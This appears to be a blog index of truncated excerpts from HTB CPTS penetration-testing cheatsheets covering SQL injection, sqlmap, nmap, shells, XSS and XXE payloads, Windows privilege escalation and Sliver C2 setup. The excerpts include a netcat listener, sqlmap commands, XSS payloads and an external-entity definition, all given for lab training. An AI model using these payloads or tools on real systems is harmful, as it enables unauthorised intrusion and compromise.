HTB CPTS Cheatsheet - SQL Injection
MySQL Command Description General mysql -u root -h docker.hackthebox.eu -P 3306 -p login to mysql database SHOW DATABASES List available databases USE users Switch to database Tables CREATE TABLE logins (id INT, ...) Add a new table SHOW TABLES List available tables in current database DESCRIBE logins Show table properties and columns INSERT INTO table_name VALUES (value_1,..) Add values to table INSERT INTO table_name(column2, ...) VALUES (column2_value, ..) Add valu...
HTB CPTS Cheatsheet - Port Enumeration
NMAP Scanning Options Nmap Option Description 10.10.10.0/24 Target network range. -sn Disables port scanning. -Pn Disables ICMP Echo Requests -n Disables DNS Resolution. -PE Performs the ping scan by using ICMP Echo Requests against the target. --packet-trace Shows all packets sent and received. --reason Displays the reason for a specific result. --disable-arp-ping Disables ARP Ping Requests. --top-ports=<num> Scans the specified top ports that have been defined as ...
HTB CPTS Cheatsheet - SQL Map
Command Description sqlmap -h View the basic help menu sqlmap -hh View the advanced help menu sqlmap -u "http://www.example.com/vuln.php?id=1" --batch Run SQLMap without asking for user input sqlmap 'http://www.example.com/' --data 'uid=1&name=test' SQLMap with POST request sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' POST request specifying an injection point with an asterisk sqlmap -r req.txt Passing an HTTP req...
HTB CPTS Cheatsheet - Shell And Payloads
Commands Description xfreerdp /v:10.129.x.x /u:htb-student /p:HTB_@cademy_stdnt! CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol env Works with many different command language interpreters to discover the environmental variables of a system. This is a great way to find out which shell language is in use sudo nc -lvnp <port #> Starts a netcat listener on a specified port nc -nv <ip address of computer with listener started><port b...
HTB CPTS Cheatsheet - Web Attacking
HTTP Verb Tampering HTTP Method HEAD PUT DELETE OPTIONS PATCH Command Description -X OPTIONS Set HTTP Method with Curl IDOR Identify IDORs In URL parameters & APIs In AJAX Calls By understanding reference hashing/encoding By comparing user roles Command Description md5sum MD5 hash a string base64 Base64 encode a string XXE Code Description <!ENTITY xxe SYSTEM "http://localhost/email.dtd"> Define External Entity to a URL <!ENTITY xxe SYSTEM &qu...
HTB CPTS Cheatsheet - Web Proxies
Burp Shortcuts Shortcut Description [CTRL+R] Send to repeater [CTRL+SHIFT+R] Go to repeater [CTRL+I] Send to intruder [CTRL+SHIFT+I] Go to intruder [CTRL+U] URL encode [CTRL+SHIFT+U] URL decode ZAP Shortcuts Shortcut Description [CTRL+B] Toggle intercept on/off [CTRL+R] Go to replacer [CTRL+E] Go to encode/decode/hash Firefox Shortcuts Shortcut Description [CTRL+SHIFT+R] Force Refresh Page
HTB CPTS Cheatsheet - Windows Privilege Escalation
Initial Enumeration Command Description xfreerdp /v:<target ip> /u:htb-student RDP to lab target ipconfig /all Get interface, IP address and DNS information arp -a Review ARP table route print Review routing table Get-MpComputerStatus Check Windows Defender status Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections List AppLocker rules Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone Test AppLocker po...
HTB CPTS Cheatsheet - Windows Privilege Escalation
Commands Code Description XSS Payloads <script>alert(window.origin)</script> Basic XSS Payload <plaintext> Basic XSS Payload <script>print()</script> Basic XSS Payload <img src="" onerror=alert(window.origin)> HTML-based XSS Payload <script>document.body.style.background = "#141d2b"</script> Change Background Color <script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg&q...
Windows Privilege Escalation
This comprehensive guide covers various methods to escalate privileges on Windows systems through leveraging dangerous privileges and group memberships. Understanding these escalation vectors is crucial for both defenders and security professionals. Privileges SeBackupPrivilege Overview: The SeBackupPrivilege allows a user to back up files and directories, regardless of their access permissions. This privilege is particularly dangerous when combined with the ability to bypass Normal Discretiona...
Get Started With Sliver C2
Author of post: SeriotonCTF https://github.com/BishopFox/sliver Installation Download both the sliver-server and sliver-client from the release for your platform and you are done :) ➜ sliver wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux ➜ sliver wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux ➜ sliver ls sliver-client sliver-server Now we can run the sliver-server and it will drop us in a console where...





